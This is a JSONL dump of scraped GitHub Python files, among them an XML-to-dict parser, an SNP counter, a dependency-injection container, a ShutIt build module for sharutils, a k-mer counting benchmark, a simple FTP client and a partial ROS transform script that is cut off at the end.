+{"seq_id":"37024319231","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\carbon\\common\\lib\\xmltodict.py\r\nfrom xml.parsers import expat\r\nfrom xml.sax.saxutils import XMLGenerator\r\nfrom xml.sax.xmlreader import AttributesImpl\r\ntry:\r\n from cStringIO import StringIO\r\nexcept ImportError:\r\n try:\r\n from StringIO import StringIO\r\n except ImportError:\r\n from io import StringIO\r\n\r\ntry:\r\n from collections import OrderedDict\r\nexcept ImportError:\r\n OrderedDict = dict\r\n\r\ntry:\r\n _basestring = basestring\r\nexcept NameError:\r\n _basestring = str\r\n\r\ntry:\r\n _unicode = unicode\r\nexcept NameError:\r\n _unicode = str\r\n\r\n__author__ = 'Martin Blech'\r\n__version__ = '0.4.4'\r\n__license__ = 'MIT'\r\n\r\nclass ParsingInterrupted(Exception):\r\n pass\r\n\r\n\r\nclass _DictSAXHandler(object):\r\n\r\n def __init__(self, item_depth = 0, item_callback = lambda *args: True, xml_attribs = True, attr_prefix = '@', cdata_key = '#text', force_cdata = False, cdata_separator = '', postprocessor = None, dict_constructor = OrderedDict):\r\n self.path = []\r\n self.stack = []\r\n self.data = None\r\n self.item = None\r\n self.item_depth = item_depth\r\n self.xml_attribs = xml_attribs\r\n self.item_callback = item_callback\r\n self.attr_prefix = attr_prefix\r\n self.cdata_key = cdata_key\r\n self.force_cdata = force_cdata\r\n self.cdata_separator = cdata_separator\r\n self.postprocessor = postprocessor\r\n self.dict_constructor = dict_constructor\r\n\r\n def startElement(self, name, attrs):\r\n attrs = self.dict_constructor(zip(attrs[0::2], attrs[1::2]))\r\n self.path.append((name, attrs or None))\r\n if len(self.path) > self.item_depth:\r\n self.stack.append((self.item, self.data))\r\n if self.xml_attribs:\r\n attrs = self.dict_constructor(((self.attr_prefix + key, value) for key, value in attrs.items()))\r\n else:\r\n attrs = None\r\n self.item = attrs or None\r\n self.data = None\r\n\r\n def endElement(self, name):\r\n if len(self.path) == self.item_depth:\r\n item = self.item\r\n if item is None:\r\n item = self.data\r\n should_continue = self.item_callback(self.path, item)\r\n if not should_continue:\r\n raise ParsingInterrupted()\r\n if len(self.stack):\r\n item, data = self.item, self.data\r\n self.item, self.data = self.stack.pop()\r\n if data and self.force_cdata and item is None:\r\n item = self.dict_constructor()\r\n if item is not None:\r\n if data:\r\n self.push_data(item, self.cdata_key, data)\r\n self.item = self.push_data(self.item, name, item)\r\n else:\r\n self.item = self.push_data(self.item, name, data)\r\n else:\r\n self.item = self.data = None\r\n self.path.pop()\r\n\r\n def characters(self, data):\r\n if not self.data:\r\n self.data = data\r\n else:\r\n self.data += self.cdata_separator + data\r\n\r\n def push_data(self, item, key, data):\r\n if self.postprocessor is not None:\r\n result = self.postprocessor(self.path, key, data)\r\n if result is None:\r\n return item\r\n key, data = result\r\n if item is None:\r\n item = self.dict_constructor()\r\n try:\r\n value = item[key]\r\n if isinstance(value, list):\r\n value.append(data)\r\n else:\r\n item[key] = [value, data]\r\n except KeyError:\r\n item[key] = data\r\n\r\n return item\r\n\r\n\r\ndef parse(xml_input, *args, **kwargs):\r\n handler = _DictSAXHandler(*args, **kwargs)\r\n parser = expat.ParserCreate()\r\n parser.ordered_attributes = True\r\n parser.StartElementHandler = handler.startElement\r\n parser.EndElementHandler = handler.endElement\r\n parser.CharacterDataHandler = handler.characters\r\n if hasattr(xml_input, 'read'):\r\n parser.ParseFile(xml_input)\r\n else:\r\n parser.Parse(xml_input, True)\r\n return handler.item\r\n\r\n\r\ndef _emit(key, value, content_handler, attr_prefix = '@', cdata_key = '#text', root = True, preprocessor = None):\r\n if preprocessor is not None:\r\n result = preprocessor(key, value)\r\n if result is None:\r\n return\r\n key, value = result\r\n if not isinstance(value, (list, tuple)):\r\n value = [value]\r\n if root and len(value) > 1:\r\n raise ValueError('document with multiple roots')\r\n for v in value:\r\n if v is None:\r\n v = OrderedDict()\r\n elif not isinstance(v, dict):\r\n v = _unicode(v)\r\n if isinstance(v, _basestring):\r\n v = OrderedDict(((cdata_key, v),))\r\n cdata = None\r\n attrs = OrderedDict()\r\n children = []\r\n for ik, iv in v.items():\r\n if ik == cdata_key:\r\n cdata = iv\r\n continue\r\n if ik.startswith(attr_prefix):\r\n attrs[ik[len(attr_prefix):]] = iv\r\n continue\r\n children.append((ik, iv))\r\n\r\n content_handler.startElement(key, AttributesImpl(attrs))\r\n for child_key, child_value in children:\r\n _emit(child_key, child_value, content_handler, attr_prefix, cdata_key, False, preprocessor)\r\n\r\n if cdata is not None:\r\n content_handler.characters(cdata)\r\n content_handler.endElement(key)\r\n\r\n\r\ndef unparse(item, output = None, encoding = 'utf-8', **kwargs):\r\n (key, value), = item.items()\r\n must_return = False\r\n if output == None:\r\n output = StringIO()\r\n must_return = True\r\n content_handler = XMLGenerator(output, encoding)\r\n content_handler.startDocument()\r\n _emit(key, value, content_handler, **kwargs)\r\n content_handler.endDocument()\r\n if must_return:\r\n value = output.getvalue()\r\n try:\r\n value = value.decode(encoding)\r\n except AttributeError:\r\n pass\r\n\r\n return value\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/xmltodict.py","file_name":"xmltodict.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35590592358","text":"#!/usr/bin/python3\n\r\n__author__ = \"Christopher Korfmann\"\r\n__copyright__ = \"Copyright (c) 2021, Christopher Korfmann\"\r\n__license__ = \"GPL-3.0-only\"\r\n__version__ = \"1.3\"\r\n\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# any later version.\r\n\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n\r\n\r\nimport re\r\nimport sys\r\n\r\ndefaultOutput = 'output.csv' # define default output file\r\n\r\n\r\nif len(sys.argv) < 2:\r\n sys.exit(\">>> Error - Need an input file. First input argument should contain the directory to a valid .map file.\\n>>> Example: snpCounter.py genome.map\\n>>> Enter 'snpCounter.py help' for more information\")\r\nif len(sys.argv) == 3:\r\n confirm = input(\r\n \">>> Warning, will overwrite any file in the current directory called \\n '\" + sys.argv[2] + \"'\\n>>> Continue? (y/n)\\n>>> \")\r\n if confirm.lower() != 'y':\r\n sys.exit(\">>> No output written. Exited successfully...\")\r\nif len(sys.argv) < 3:\r\n if (sys.argv[1].lower() == \"help\"):\r\n sys.exit(\"\\n############\\nUsage: snpCounter.py \\n############\\nInput File: valid .map file\\nOutput File: (OPTIONAL) Comma separated text list with headers, containing count of unique SNP's\\n at specific nucleotide positions from .map file.\\n\\nExample output file format:\\nPosition,Base,A,C,G,T\\n55,A,957,2,28,1\\n\\nSpecified output file will be overwritten, if one with an identical name exists \\n (or 'output.csv' in the current directory, in the case where no output is specified)\")\r\n confirm = input(\r\n \">>> Warning, will overwrite any file in the current directory called 'output.csv'\\n>>> Continue? (y/n)\\n>>> \")\r\n if confirm.lower() != 'y':\r\n sys.exit(\">>> No output written. Exited successfully...\")\r\n sys.argv.append(defaultOutput) # set output to default ('output.csv')\r\n\r\n\r\ndef main():\r\n # unique SNP objects and SNP list\r\n class snpList:\r\n total = [] # static list of all unique substitutions\r\n\r\n def __init__(self, position, base, substitution):\r\n self.position = position # integer position of SNP\r\n self.base = base # expected base at the position\r\n\r\n # initialize counters for each type of substitution\r\n if base == 'A':\r\n self.ACcount = 0\r\n self.AGcount = 0\r\n self.ATcount = 0\r\n\r\n if base == 'C':\r\n self.CAcount = 0\r\n self.CGcount = 0\r\n self.CTcount = 0\r\n\r\n if base == 'G':\r\n self.GCcount = 0\r\n self.GAcount = 0\r\n self.GTcount = 0\r\n\r\n if base == 'T':\r\n self.TCcount = 0\r\n self.TGcount = 0\r\n self.TAcount = 0\r\n\r\n self.add(substitution)\r\n snpList.total.append(self)\r\n\r\n # substitution specific incrementer\r\n def add(self, substitution):\r\n if self.base == 'A':\r\n if substitution == 'C':\r\n self.ACcount += 1\r\n if substitution == 'G':\r\n self.AGcount += 1\r\n if substitution == 'T':\r\n self.ATcount += 1\r\n\r\n if self.base == 'C':\r\n if substitution == 'G':\r\n self.CGcount += 1\r\n if substitution == 'A':\r\n self.CAcount += 1\r\n if substitution == 'T':\r\n self.CTcount += 1\r\n\r\n if self.base == 'G':\r\n if substitution == 'A':\r\n self.GAcount += 1\r\n if substitution == 'T':\r\n self.GTcount += 1\r\n if substitution == 'C':\r\n self.GCcount += 1\r\n\r\n if self.base == 'T':\r\n if substitution == 'A':\r\n self.TAcount += 1\r\n if substitution == 'G':\r\n self.TGcount += 1\r\n if substitution == 'C':\r\n self.TCcount += 1\r\n\r\n lineCount = 0\r\n try:\r\n with open(sys.argv[1], 'r') as f:\r\n\r\n for item in f.readlines():\r\n # split current line into space separated tokens\r\n # current line length may be variable across runtimes, thus it's safest to tokenize\r\n line = re.split(r'\\t', item)\r\n if len(line) > 2:\r\n lineCount += 1\r\n # tokenize the SNP string (last space separated string in each line of .map file)\r\n snpString = re.split(r'[, \\n]', line[7])\r\n # parse through current SNP string token and generate usable unique SNP token\r\n for snpToken in snpString:\r\n if snpToken:\r\n # split current SNP token into position, expected base, and substitution\r\n SNP = re.split(r'[:>]', snpToken)\r\n # capture actual position (not zero-based index position) of SNP\r\n snpPosition = int(SNP[0]) + 1\r\n # capture expected base\r\n base = SNP[1]\r\n # capture substituted base\r\n substitution = SNP[2]\r\n\r\n index = 0\r\n for snpElem in snpList.total: # check if current position/base pair exists in the list\r\n if snpElem.position == snpPosition and snpElem.base == base:\r\n # if exists, increment substitution specific counter\r\n snpElem.add(substitution)\r\n break\r\n index += 1\r\n\r\n # if doesn't exist, add position/base pair to list\r\n if index == len(snpList.total):\r\n snpList(snpPosition, base, substitution)\r\n except:\r\n sys.exit(\">>> Error reading input.\\n>>> Verify that the input is a valid .map file, the input directory is a valid directory, and\\n that you have privileges to access the input directory.\\n>>> No output written. Terminated...\")\r\n\r\n try:\r\n with open(sys.argv[2], 'w') as o:\r\n print('Position,Base,A,C,G,T', file=o)\r\n for final in snpList.total: # print each position/base pair and its substitution counters\r\n if final.base == 'A':\r\n print(str(final.position) + ',' + final.base + ',' + str(lineCount - (final.ACcount + final.AGcount +\r\n final.ATcount)) + ',' + str(final.ACcount) + ',' + str(final.AGcount) + ',' + str(final.ATcount), file=o)\r\n if final.base == 'C':\r\n print(str(final.position) + ',' + final.base + ',' + str(final.CAcount) + ',' + str(lineCount - (\r\n final.CAcount + final.CGcount + final.CTcount)) + ',' + str(final.CGcount) + ',' + str(final.CTcount), file=o)\r\n if final.base == 'G':\r\n print(str(final.position) + ',' + final.base + ',' + str(final.GAcount) + ',' + str(final.GCcount) + ',' +\r\n str(lineCount - (final.GCcount + final.GAcount + final.GTcount)) + ',' + str(final.GTcount), file=o)\r\n if final.base == 'T':\r\n print(str(final.position) + ',' + final.base + ',' + str(final.TAcount) + ',' + str(final.TCcount) + ',' +\r\n str(final.TGcount) + ',' + str(lineCount - (final.TCcount + final.TGcount + final.TAcount)), file=o)\r\n\r\n print('>>> Output written to \\n \"' + sys.argv[2] + '\"')\r\n except:\r\n sys.exit(\">>> Error writing output.\\n>>> Verify that you have privileges to write to the output directory, or if the output file is open in another program.\\n Else, try a different directory or file.\\n>>> No output written. Terminated...\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n# Author: Christopher Korfmann\r\n# Copyright (c) 2021, Christopher Korfmann\r\n","repo_name":"ckorfmann/snp-counter","sub_path":"snpCounter.py","file_name":"snpCounter.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27938583474","text":"from lib2to3.pgen2.driver import Driver\r\nfrom Person import Person\r\nfrom Job import Job\r\nfrom Driver import Driver\r\n\r\nPers1 = Person(32, \"Andre\", \"Pria\", 1)\r\nJob1 = Job(Pers1, 101, \"Go Jek\", \"Driver\")\r\nDri1 = Driver(Pers1, 101, \"Gofood\", \"Driver\", 1002, \"2 Jan 2020\", \"Taxi\")\r\nJob1.outputJob()\r\nDri1.outputDriver()\r\n\r\nPers2 = Person(33, \"Yuli\", \"Wanita\", 0)\r\nJob2 = Job(Pers2, 102, \"Tix.com\", \"General Manager\")\r\nJob2.outputJob()\r\nprint(\"=================================================\")\r\n\r\nPers3 = Person(34, \"Hendra\", \"Pria\", 0)\r\nJob3 = Job(Pers3, 103, \"Grab\", \"Driver\")\r\nDri3 = Driver(Pers3, 103, \"Grab\", \"Driver\", 1003, \"1 Agu 2024\", \"Sepeda Motor\")\r\nJob3.outputJob()\r\nDri3.outputDriver()\r\n\r\nPers4 = Person(35, \"Bambang\", \"Pria\", 0)\r\nJob4 = Job(Pers4, 105, \"First Media\", \"CEO\")\r\nJob4.outputJob()\r\nprint(\"=================================================\")\r\n\r\nPers5 = Person(50, \"Diana\", \"Wanita\", 1)\r\nJob5 = Job(Pers5, 106, \"Buka Lapak\", \"Staff\")\r\nJob5.outputJob()\r\nprint(\"=================================================\")\r\n","repo_name":"giovanialvin/LATIHAN4DPBO2022","sub_path":"Bagian 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42362621539","text":"from _contextvars import ContextVar\nfrom importlib import import_module\nfrom typing import Generic, TypeVar, List, Dict, Any\nfrom abc import abstractmethod, ABC\nfrom os import path\nfrom yaml import safe_load\nfrom gate.exceptions import ServiceNotFountException, ParameterNotDefinedException\n\n\nclass AbstractContainer(ABC):\n\n @abstractmethod\n def has_service(self, name: str): pass\n\n @abstractmethod\n def has_parameter(self, name: str): pass\n\n @abstractmethod\n def get_service(self, name: str): pass\n\n @abstractmethod\n def get_parameter(self, name: str): pass\n\n\nclass Container(AbstractContainer):\n\n def __init__(self, parameters: Dict[str, Any] = None, services: Dict[str, Dict] = None):\n self._parameters = parameters or {}\n self._services = services or {}\n\n def has_service(self, name: str):\n return name in self._services.keys()\n\n def has_parameter(self, name: str):\n return name in self._parameters.keys()\n\n def get_service(self, name: str):\n if not self.has_service(name):\n raise ServiceNotFountException(name)\n return self._services.get(name)\n\n def get_parameter(self, name: str):\n if not self.has_parameter(name):\n raise ParameterNotDefinedException(name)\n return self._parameters.get(name)\n\n\nclass ContainerStack(AbstractContainer):\n\n def __init__(self, containers: List[AbstractContainer] = None):\n self._containers = containers or []\n self._services = {}\n self._parameters = {}\n\n def has_service(self, name: str):\n return name in self._services.keys() or any((container.has_service(name) for container in self._containers))\n\n def has_parameter(self, name: str):\n return name in self._parameters.keys() or any((container.has_parameter(name) for container in self._containers))\n\n def get_service(self, name: str):\n service = self._services.get(name)\n if service is None:\n for container in self._containers:\n if container.has_service(name):\n service = container.get_service(name)\n break\n if service is None:\n raise ServiceNotFountException(name)\n else:\n self._services[name] = service\n return service\n\n def get_parameter(self, name: str):\n parameter = self._parameters.get(name)\n if parameter is None:\n for container in self._containers:\n if container.has_parameter(name):\n parameter = container.get_parameter(name)\n break\n if parameter is None:\n raise ParameterNotDefinedException(name)\n else:\n self._parameters[name] = parameter\n return parameter\n\n\nclass ContextContainer(AbstractContainer):\n\n def __init__(self, container: AbstractContainer):\n self._container = container\n self.services_instances = {}\n self.runtime_parameters = {}\n\n def has_service(self, name: str):\n return name in self.services_instances.keys() or self._container.has_service(name)\n\n def has_parameter(self, name: str):\n return name in self.runtime_parameters.keys() or self._container.has_parameter(name)\n\n def get_service(self, name: str):\n if 'container' == name:\n return self\n if name not in self.services_instances.keys():\n from .resolvers import ServiceResolver\n service_resolver = ServiceResolver(self)\n self.services_instances[name] = service_resolver.resolve(name, self._container.get_service(name))\n return self.services_instances.get(name)\n\n def get_parameter(self, name: str):\n if name not in self.runtime_parameters.keys():\n from .resolvers import ParameterResolver\n parameter_resolver = ParameterResolver(self)\n parameter = parameter_resolver.resolve(name)\n if parameter.persist:\n self.runtime_parameters[name] = parameter.value\n else:\n return parameter.value\n return self.runtime_parameters.get(name)\n\n\nclass ApplicationContainer(AbstractContainer):\n\n def __init__(self, settings, container: AbstractContainer = None):\n self._instance = ContextVar('instance', default=container)\n self._settings = settings\n\n @property\n def instance(self) -> ContextContainer:\n if self._instance.get() is None:\n containers = []\n for module in getattr(self._settings, 'MODULES', []):\n try:\n container = getattr(import_module(f'{module}.container'), 'default')\n except:\n container = None\n if container is None:\n file_path = path.join(*module.split('.'), 'service.yml')\n if path.exists(file_path):\n with open(file_path) as file_config:\n configuration = safe_load(file_config)\n container = Container(**configuration)\n if container is not None:\n containers.append(container)\n context_container = ContextContainer(ContainerStack(list(reversed(containers))))\n if self._settings:\n context_container.runtime_parameters['settings'] = self._settings\n self._instance.set(context_container)\n return self._instance.get()\n\n def has_service(self, name: str):\n return name == 'container' or self.instance.has_service(name)\n\n def has_parameter(self, name: str):\n return self.instance.has_parameter(name)\n\n def get_service(self, name: str):\n return self.instance.get_service(name)\n\n def get_parameter(self, name: str):\n return self.instance.get_parameter(name)\n","repo_name":"WatanukiRasadar/gate","sub_path":"gate/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31705368957","text":"\"\"\"ShutIt module. See http://shutit.tk\n\"\"\"\n\nfrom shutit_module import ShutItModule\n\n\nclass sharutils(ShutItModule):\n\n\tdef build(self, shutit):\n\t\tshutit.send('mkdir -p /tmp/build/sharutils')\n\t\tshutit.send('cd /tmp/build/sharutils')\n\t\tshutit.send('wget -qO- http://ftp.gnu.org/gnu/sharutils/sharutils-4.14.tar.xz | xz -d | tar -xf -')\n\t\tshutit.send('cd sharutils*')\n\t\tshutit.send('./configure --prefix=/usr')\n\t\tshutit.send('make')\n\t\tshutit.send('make install')\n\t\treturn True\n\n\t#def get_config(self, shutit):\n\t#\tshutit.get_config(self.module_id,'item','default')\n\t#\treturn True\n\n\tdef finalize(self, shutit):\n\t\tshutit.send('rm -rf /tmp/build/sharutils')\n\t\treturn True\n\n\t#def remove(self, shutit):\n\t#\treturn True\n\n\t#def test(self, shutit):\n\t#\treturn True\n\ndef module():\n\treturn sharutils(\n\t\t'shutit.tk.sd.sharutils.sharutils', 158844782.0012,\n\t\tdescription='',\n\t\tmaintainer='',\n\t\tdepends=['shutit.tk.setup']\n\t)\n\n","repo_name":"ianmiell/shutit-distro","sub_path":"sharutils/sharutils.py","file_name":"sharutils.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} +{"seq_id":"22025347466","text":"import logging\nimport sys\nlogging.basicConfig(level=logging.INFO)\nimport numpy as np\nimport time\nfrom kmer_mapper.mapper import map_kmers_to_graph_index\nfrom npstructures import Counter\nfrom graph_kmer_index import KmerIndex, CounterKmerIndex\nfrom kmer_mapper.parser import BufferedNumpyParser, OneLineFastaBuffer2Bit\nfrom kmer_mapper.kmers import KmerHash, TwoBitHash\nfrom kmer_mapper.util import log_memory_usage_now\nfrom shared_memory_wrapper import from_file, to_shared_memory, from_shared_memory, to_file\nfrom profilehooks import profile\n\n\ndef get_kmer_hashes():\n parser = BufferedNumpyParser.from_filename(sys.argv[2], 1250000 * 130)\n chunks = parser.get_chunks()\n reads = (to_shared_memory(chunk) for chunk in chunks)\n\n return reads\n raw_chunk = next(chunks)\n sequence_chunk = raw_chunk.get_sequences()\n\n\n return hashes\n\n#@profile\ndef map_with_counter(kmers, index):\n return index.counter.count(kmers)\n #return index.count_kmers(kmers)\n\n\ndef _map_with_cython(reads, index):\n max_node_id = 83559391\n \n raw_chunk = from_shared_memory(OneLineFastaBuffer2Bit, reads)\n sequence_chunk = raw_chunk.get_sequences()\n logging.info(\"Size of sequence chunk (GB): %.3f\" % (sequence_chunk.nbytes() / 1000000000))\n\n t = time.perf_counter()\n hashes = TwoBitHash(k=31).get_kmer_hashes(sequence_chunk)\n logging.info(\"Size of hashes (GB): %.3f\" % (hashes.nbytes / 1000000000))\n logging.info(\"Time spent to get %d kmer hashes: %.3f\" % (len(hashes), time.perf_counter() - t))\n\n\ndef map_with_cython(hashes, index):\n return map_kmers_to_graph_index(index, index.max_node_id(), hashes, 1000)\n\nkmer_index = KmerIndex.from_file(\"tests/kmer_index_only_variants_with_revcomp.npz\")\nkmer_index.convert_to_int32()\nkmer_index.remove_ref_offsets()\n\n#kmers = kmer_index._kmers\n#np.random.shuffle(kmers)\n\nkmers = np.random.randint(0, 1000000000000, 100000000, dtype=np.uint64)\n#counter = CounterKmerIndex.from_kmer_index(kmer_index)\n\n\nfrom numba_kmer_counter.numba_kmer_counter import Index\nfrom numba_kmer_counter import numba_kmer_counter as nkc\nnumba_counter = nkc.Counter(nkc.Index.from_unique_kmers(np.unique(kmer_index._kmers), modulo=kmer_index._modulo))\nnumba_index = numba_counter.index\nnumba_index = from_file(to_file(numba_index))\nprint(numba_counter)\n\ndef numba_count(kmers, index):\n nkc.Index.query_numba(index, kmers)\n #index.count(kmers)\n\n\nfrom numba_kmer_counter.cython_functions import query_index\nfrom numba_kmer_counter import cython_functions\ndef new_cython_count(kmers, index):\n return cython_functions.query_index(index, kmers)\n\ndef old_new_cython_count(kmers, index):\n return cython_functions.map_kmers_to_graph_index(index, kmers)\n\ndef old_cython_count_in_new_code(kmers, index):\n return cython_functions.map_kmers_to_graph_index_old(index, index.max_node_id(), kmers)\n\n#reads = get_kmer_hashes()\n\n#logging.info(\"N kmer hashes: %d\" % len(kmers))\n\n\nprint(kmers)\nprint(\"N kmers: %d\" % len(kmers))\n\nlogging.info(\"Making counter\")\n#counter = Counter(index_kmers)\n#counter = from_file(\"tests/counter_index.npz\")\ncounter = CounterKmerIndex.from_kmer_index(kmer_index)\ncounter = from_file(to_file(counter))\n#kmers = np.concatenate([index_kmers for i in range(100)])\n\n\n\nlogging.info(\"Getting kmers\")\n\n#kmers = np.random.randint(0, 4**31, 96000000, dtype=np.int64)\n\nimport bionumpy as bnp\n#file = bnp.open(sys.argv[3])\n#chunks = file.read_chunks()\n\n\nfor _ in range(3):\n #for function, index in [(old_cython_count_in_new_code, kmer_index), (old_new_cython_count, kmer_index), (numba_count, numba_index), (map_with_counter, counter), (map_with_cython, kmer_index), (new_cython_count, numba_index)]:\n for function, index in [(numba_count, numba_index), (map_with_counter, counter), (map_with_cython, kmer_index), (new_cython_count, numba_index)]:\n #for function, index in [(map_with_cython, kmer_index2)]:\n t = time.perf_counter()\n function(kmers, index)\n print(str(function), time.perf_counter()-t)\n\n\n\n\n\n\n","repo_name":"ivargr/kmer_mapper","sub_path":"test_counter.py","file_name":"test_counter.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17886271190","text":"import ftplib\nfrom ftplib import FTP\nimport logging\nimport os\nimport argparse\nimport json\n\nDEBUG_LOG_LEVEL = 2\n\nclass FTPClient:\n def __init__(self, debug_level=DEBUG_LOG_LEVEL):\n self.ftp = 0\n self.debug_level = debug_level\n self.host = ''\n\n def connect(self, addr, username, password):\n self.host, self.port = addr\n self.ftp = FTP()\n self.ftp.set_debuglevel(self.debug_level)\n try:\n logging.debug('Connecting %s:%s'%(self.host, self.port))\n self.ftp.connect(self.host, self.port)\n except OSError as err:\n logging.error(\"Connect %s:%d failed!, %s\"%(self.host, self.port, err))\n return False\n try:\n self.ftp.login(username, password)\n except ftplib.all_errors as err:\n logging.error(\"Login %s failed!, %s\"%(username, err))\n return False\n\n logging.info('Connect %s:%d success'%addr)\n return True\n\n def download(self, remotepath, localpath):\n bufsize = 1024\n fp = open(localpath,'wb')\n try:\n self.ftp.retrbinary('RETR ' + remotepath, fp.write, bufsize)\n logging.info('Download %s from %s success'%(remotepath, self.host))\n except ftplib.all_errors as err:\n logging.error(\"Download %s from %s failed!, %s\"%(remotepath, self.host, err))\n fp.close()\n\n def upload(self, remotepath, localpath):\n bufsize = 1024\n fp = open(localpath, 'rb')\n try:\n self.ftp.storbinary('STOR '+ remotepath , fp, bufsize)\n logging.info('Upload %s from %s success'%(remotepath, self.host))\n except ftplib.all_errors as err:\n logging.error(\"Upload %s from %s failed!, %s\"%(localpath, self.host, err))\n fp.close()\n\n def delete(self, remotepath):\n try:\n self.ftp.delete(remotepath)\n logging.info('Upload %s from %s success'%(remotepath, self.host))\n except ftplib.all_errors as err:\n logging.error(\"Delete %s from %s failed!, %s\"%(remotepath, self.host, err))\n \n\ndef loadFTPServerList(config_file):\n server_list = []\n with open(config_file) as config:\n config_dict = json.load(config)\n logging.debug(config_dict)\n ftp_servers = config_dict['ftp_server']\n for server in ftp_servers:\n server_list.append((server[\"ip\"], server[\"port\"]))\n\n return server_list\n\n\nif __name__ == \"__main__\":\n LOG_FORMAT = \"[%(asctime)s:%(levelname)s:%(funcName)s] %(message)s\"\n log_level = logging.DEBUG\n logging.basicConfig(level=log_level, format=LOG_FORMAT)\n\n arg_parser = argparse.ArgumentParser(description='manual to this script')\n arg_parser.add_argument('-c', '--config_file', help='config file', type=str)\n arg_parser.add_argument('-d', '--delete', help='delete file', type=str)\n arg_parser.add_argument('-u', '--upload', help='upload file', action=\"store_true\")\n arg_parser.add_argument('-p', '--pull', help='pull file', action=\"store_true\")\n arg_parser.add_argument('-r', '--remote_path', help='remote path', type=str)\n arg_parser.add_argument('-l', '--local_path', help='local path', type=str)\n args = arg_parser.parse_args()\n\n config_file = args.config_file\n\n ftp_list = loadFTPServerList(config_file)\n logging.debug(ftp_list)\n\n ftp_client_list = []\n for ftp_host in ftp_list:\n ftp_client = FTPClient(0)\n ret = ftp_client.connect(ftp_host,\n 'qpy3', 'qpy3')\n\n if ret:\n ftp_client_list.append(ftp_client)\n\n \n if args.delete:\n delete_path = args.delete\n for client in ftp_client_list:\n client.delete(delete_path)\n elif args.upload:\n remote_path = args.remote_path\n local_path = args.local_path\n for client in ftp_client_list:\n client.upload(remote_path, local_path)\n elif args.pull:\n remote_path = args.remote_path\n local_path = args.local_path\n for client in ftp_client_list:\n client.download(remote_path, local_path)\n","repo_name":"shmilycode/FTPClient","sub_path":"ftp.py","file_name":"ftp.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73210906724","text":"### December 1st\n\ndef first_ex(puzzle):\n\n all_diff = []\n for el in puzzle:\n number = [int(digit) for digit in el]\n all_diff.append(max(number)-min(number))\n\n return sum(all_diff)\n\ndef second_ex(puzzle):\n\n rows_div = []\n for el in puzzle:\n number = [int(digit) for digit in el]\n div = []\n for i in range(len(number)):\n for j in range(0, len(number)):\n if ((number[i]%number[j])==0 or (number[j]%number[i])==0) and (i!=j):\n div.append(number[i]//number[j])\n\n rows_div.append(sum(div))\n\n return sum(rows_div)\n\nif __name__ == '__main__':\n\n input_path = './input_dec2nd.txt'\n puzzle = open(input_path).read().strip()\n puzzle = [el.split('\\t') for el in puzzle.split('\\n')]\n\n result_first = first_ex(puzzle)\n print('Result: (first_ex): %d' %result_first)\n\n result_second = second_ex(puzzle)\n print('Result: (second_ex): %d' %result_second)\n","repo_name":"giorgia2988/adventOfCode17","sub_path":"dec2nd.py","file_name":"dec2nd.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33299726489","text":"import rospy\nimport tf\nfrom tf import TransformListener\nimport numpy as np\n\ndef main():\n c1Link_to_c1ColorOpticalFrame_pos = np.asarray([-0.000, 0.015, 0.000])\n c1Link_to_c1ColorOpticalFrame_rot = tf.transformations.quaternion_matrix(np.asarray([0.506, -0.494, 0.507, -0.492]))\n\n mat = np.asarray([[ 0.4060203 , 0.75756728, -0.51111576, 0.17559398],\n [-0.76612722, 0.58706488, 0.26154141, -0.0421986 ],\n [ 0.49819333, 0.28538857, 0.81875318, 0.0133699 ],\n [ 0. , 0. , 0. , 1. ]])\n\n c2ColorOpticalFrame_to_c2Link_pos = np.asarray([0.015, 0.001, -0.000])\n c2ColorOpticalFrame_to_c2Link_rot = tf.transformations.quaternion_matrix(np.asarray([0.507, -0.495, 0.501, 0.497]))\n\n # now form the transformation matrices\n c1Link_to_c1ColorOpticalFrame = c1Link_to_c1ColorOpticalFrame_rot\n c1Link_to_c1ColorOpticalFrame[:3, 3] = c1Link_to_c1ColorOpticalFrame_pos\n\n c2ColorOpticalFrame_to_c2Link = c2ColorOpticalFrame_to_c2Link_rot\n c2ColorOpticalFrame_to_c2Link[:3, 3] = c2ColorOpticalFrame_to_c2Link_pos\n\n c1Link_to_c2ColorOpticalFrame = np.dot(c1Link_to_c1ColorOpticalFrame, tf.transformations.inverse_matrix(mat))\n c1Link_to_c2Link = np.dot(c1Link_to_c2ColorOpticalFrame, c2ColorOpticalFrame_to_c2Link)\n\n c1Link_to_c2Link_pos = c1Link_to_c2Link[:3, 3]\n c1Link_to_c2Link_quat = tf.transformations.quaternion_from_matrix(c1Link_to_c2Link)\n\n # .................. for camera3 to camera1 .................................... #\n \n c1_to_c3_mat = np.asarray([[-0.32151113, 0.78765464, -0.5255766 , 0.34445858],\n [-0.70964797, 0.1670522 , 0.68446572, -0.18581281],\n [ 0.62692133, 0.59303771, 0.50524837, 0.13664849],\n [ 0. , 0. , 0. , 1. ]])\n\n 